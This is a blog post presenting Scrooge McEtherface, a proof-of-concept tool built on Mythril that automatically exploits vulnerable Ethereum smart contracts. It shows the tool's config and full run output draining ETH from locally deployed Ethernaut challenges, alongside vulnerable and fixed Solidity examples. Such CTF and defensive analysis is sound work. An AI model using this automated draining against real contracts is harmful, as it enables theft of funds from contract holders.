In my previous article I showed that Mythril can discover non-trivial vulnerabilities in Ethereum smart contracts and compute the transaction(s) needed to exploit them. The obvious next step: Why not build an all-in-one tool that automates the whole process? Enter Scrooge McEtherface, a proof-of-concept I hacked together over the past few days. Scrooge uses Mythril’s Ether Thief and Suicide modules to automatically extract ETH from vulnerable smart contracts.

Scrooge turned out to be pretty easy to write — it’s less than 200 lines of code and as you can see on the screenshot, 95% of the engineering effort went into improving the graphics. I also tested it on a couple of Ethernaut challenges. Here’s the rundown.

Fallout

The first challenge contains the classic misnamed-constructor flaw: anyone can become the owner by calling Fal1Out(). We know that Mythril detects this with default settings, so it should be an easy win.
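To make the flaw concrete, here is a constructed illustration of the pattern (not the Ethernaut Fallout source and not code from Scrooge or Mythril), with the vulnerable form next to the fix. The contract and function names are my own.

```solidity
// SPDX-License-Identifier: MIT
// Constructed illustration of the misnamed-constructor flaw. Pinned to 0.4.x
// because the bug only exists with old-style (name-based) constructors.
pragma solidity ^0.4.24;

// VULNERABLE: "Fal1Out" (digit 1) does not match the contract name "Fallout",
// so the compiler treats it as an ordinary public function instead of the
// constructor. It is callable by anyone, at any time, after deployment.
contract FalloutVulnerable {
    address public owner;

    function Fal1Out() public payable {
        owner = msg.sender;
    }

    function collect() public {
        require(msg.sender == owner, "not owner");
        owner.transfer(address(this).balance);
    }

    function () external payable {}
}

// FIXED: the constructor keyword (available since 0.4.22) cannot be misspelled
// into a regular function and runs exactly once at deployment. Note that a
// 0.5.x compiler rejects name-based constructors outright, so bumping the
// pragma is the cheapest way to rule out this whole bug class.
contract FalloutFixed {
    address public owner;

    constructor() public {
        owner = msg.sender;
    }

    function collect() public {
        require(msg.sender == owner, "not owner");
        owner.transfer(address(this).balance);
    }

    function () external payable {}
}
```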

Scrooge has a configuration file that contains a few basic options. Unless you have a fully synced Ropsten node, the easiest way to reproduce this is firing up Ganache and deploying the contract locally using Remix.

In my own experiment I edited the settings in Scrooge’s config.ini to point to Ganache RPC and use a pre-generated Ganache test account (different from the contract creator) to send transactions from.

[settings]
rpc = https://localhost:8545
sender = 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9
symbolic_tx_count = 2

Scrooge is now locked-and-loaded. In fact, it’s so script-kiddy friendly that it doesn’t accept any command line arguments besides the target address. Here is the output from running Scrooge against the Fallout contract:

$ ./scrooge 0x27d390aa4a929012b58ed6662f2dcf8e6a7f8291
Scrooge McEtherface at your service.
Exploring 0x27d390aA4a929012b58Ed6662F2dcf8E6a7F8291 over 2 symbolic transactions. Your initial account balance is 100.00000 ETH.
Charging lasers...
Looks like anyone can withdraw ETH from this contract.
You are about to send the following transaction:
From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0x27d390aA4a929012b58Ed6662F2dcf8E6a7F8291, Value: 0
Data: 0x6fab5ddf
Are you sure you want to proceed (y/N)?
Transaction sent successfully, tx-hash: 0x619d4b4ba80a9cddabab0044dee857ae7e60b53c97bc9fb674227f579dd17cc2.
Waiting for transaction to be mined...
You are about to send the following transaction:
From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0x27d390aA4a929012b58Ed6662F2dcf8E6a7F8291, Value: 0
Data: 0x8aa96f38
Are you sure you want to proceed (y/N)?
Transaction sent successfully, tx-hash: 0x59dd01aae6b8c150f4593fdfbf23c62d80605ccd3a3d7f61500ac0018bbdee61.
Waiting for transaction to be mined...
Snagged 4.99988 ETH. Your final account balance is 104.99988 ETH.

Looks like it worked! We lost a few Wei to transaction fees, but the rest ended up in our account.

Fallback

In Fallback, the goal is to send a specific sequence of transactions to become the contract owner. The challenge is easy for a human attacker, but not that trivial to solve for an automated analyzer.

First of all, it requires three transactions to be sent in the correct order. As I wrote in my previous article, Mythril can explore program states over an arbitrary number of transactions, but the cost of analysis increases exponentially with the number of transactions.

A successful attack also requires sending small amounts of ETH with the first two transactions. Those amounts need to be chosen such that the attack is profitable. Optimally, they’d also be tuned to maximize profits.

Scrooge doesn’t do any of those optimizations (don’t complain, it was a weekend project and PRs are of course welcome). You can, however, increase the number of transactions it explores in config.ini. For Fallback this variable needs to be set to 3:

symbolic_tx_count = 3

Now we should be ready to pwn a locally deployed Fallback instance with a balance of 5 ETH:

$ ./scrooge 0xffee64cf24b12d9b4de460a3ef6d39fedd431d88
Scrooge McEtherface at your service.
Exploring 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88 over 3 symbolic transactions.
Your initial account balance is 109.99975 ETH.
Charging lasers...
Looks like anyone can withdraw ETH from this contract.
You are about to send the following transaction:
WARNING: You'll be transferring 0.00056 ETH wth this transaction
From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88, Value: 562949953421312
Data: 0xd7bb99ba
Are you sure you want to proceed (y/N)?
Transaction sent successfully, tx-hash: 0x0961f1ada3bcd0b3ed1065466a9d6d08d3cbe11bb3de6a3f88e15efa2fb1f3e3.
Waiting for transaction to be mined...
You are about to send the following transaction:
WARNING: You'll be transferring 0.00000 ETH wth this transaction
From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88, Value: 549755813888
Data: 0x
Are you sure you want to proceed (y/N)?
Transaction sent successfully, tx-hash: 0xe715eca2abef303910e950860ea00f0c0b3bd54d40cf1273f1f8eba51aae05c0.
Waiting for transaction to be mined...
You are about to send the following transaction:
From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88, Value: 0
Data: 0x3ccfd60b
Are you sure you want to proceed (y/N)?
Transaction sent successfully, tx-hash: 0x366ffbf28dbe258bbf102595de70107c03fc35d69387f6ba2ce71fe866cf3320.
Waiting for transaction to be mined...
Snagged 4.99980 ETH. Your final account balance is 114.99956 ETH.

Looking good! Note that in this case, Scrooge created three transactions and sent small amounts of Wei along with the first two (it could probably have sent just 1 Wei but we’ll take the loss).
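What the three transactions above exploit, and how a contract author avoids it, is easier to see in code. The following is a constructed illustration (not the Ethernaut Fallback source, and not code from Scrooge or Mythril): a fallback that changes privileged state, next to a hardened version where receiving ETH never changes ownership. Names and amounts are my own.

```solidity
// SPDX-License-Identifier: MIT
// Constructed illustration: ownership changed as a side effect of a value
// transfer (vulnerable) vs. ownership changed only by the owner (fixed).
pragma solidity ^0.4.24;

// VULNERABLE: any account with a prior (arbitrarily small) contribution can
// take ownership by sending a plain value transfer with empty calldata, then
// drain the balance through withdraw(). That is a three-step sequence a
// multi-transaction symbolic analysis can find.
contract FallbackVulnerable {
    address public owner;
    mapping(address => uint256) public contributions;
    constructor() public {
        owner = msg.sender;
        contributions[msg.sender] = 1000 ether;
    }
    function contribute() public payable {
        require(msg.value < 0.001 ether, "contribution too large");
        contributions[msg.sender] += msg.value;
        if (contributions[msg.sender] > contributions[owner]) owner = msg.sender;
    }
    function withdraw() public {
        require(msg.sender == owner, "not owner");
        owner.transfer(address(this).balance);
    }
    // The bug: a privileged state transition gated only on msg.value and
    // on having contributed before.
    function () external payable {
        require(msg.value > 0 && contributions[msg.sender] > 0);
        owner = msg.sender;
    }
}

// FIXED: the fallback only records the deposit. Ownership moves only through
// an explicit owner-only call, so no transaction sequence from an arbitrary
// sender reaches the transfer in withdraw().
contract FallbackFixed {
    address public owner;
    mapping(address => uint256) public contributions;
    constructor() public { owner = msg.sender; }
    function transferOwnership(address newOwner) public {
        require(msg.sender == owner && newOwner != address(0));
        owner = newOwner;
    }
    function withdraw() public {
        require(msg.sender == owner, "not owner");
        owner.transfer(address(this).balance);
    }
    function () external payable { contributions[msg.sender] += msg.value; }
}
```

Running Mythril with the same symbolic_tx_count against both contracts is a quick regression check: the vulnerable one should trip the Ether Thief module, the fixed one should not.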

Wow, Isn’t This a Very Dangerous Tool?

In March 2018, researchers claimed to have found 34,000 exploitable contracts on the Ethereum mainnet. These claims were wildly overblown. It would be naive to believe that Scrooge-like tools (some of them private) aren’t run by bad actors at all times. In fact, finding medium-complexity bugs in older accounts that haven’t been exploited yet is highly unlikely (my guess is that the MAIAN results contained 33,998 false positives, but I’m happy to have a look at the data should it be released).

Here are some numbers that are based on my own observations and match the experience of several other researchers working in the field. On average, there are one or two exploitable contracts deployed on the mainnet per week, but most of them never hold any ETH. If an opportunity opens up, attackers race to exploit it (the time window does seem to stay open for several hours, so apparently the hackers' toolsets could still benefit from some optimization).

Then of course, honeypots can be tailored to specific tools, and script kiddies running tools like Scrooge are easy targets. I built in a few checks and warnings, but then again, if you trip into a honeypot you deserve to lose your ETH.

TL;DR

Scrooge McEtherface fully automates attacks on vulnerable smart contracts and extracts the ETH to the attacker’s account. It is based on Mythril Classic and can therefore compute complex attacks that require multiple transactions to be sent with specific inputs. Use it responsibly and hop on our Discord Server for discussion.

About Mythril and MythX

Mythril is a free and open-source smart contract security analyzer. It uses symbolic execution to detect a variety of security vulnerabilities.

MythX is a cloud-based smart contract security service that seamlessly integrates into smart contract development environments and build pipelines. It bundles multiple bleeding-edge security analysis processes into an easy-to-use API that allows anyone to create purpose-built smart contract security tools. MythX is compatible with Ethereum, Tron, Vechain, Quorum, Rootstock and other EVM-based platforms.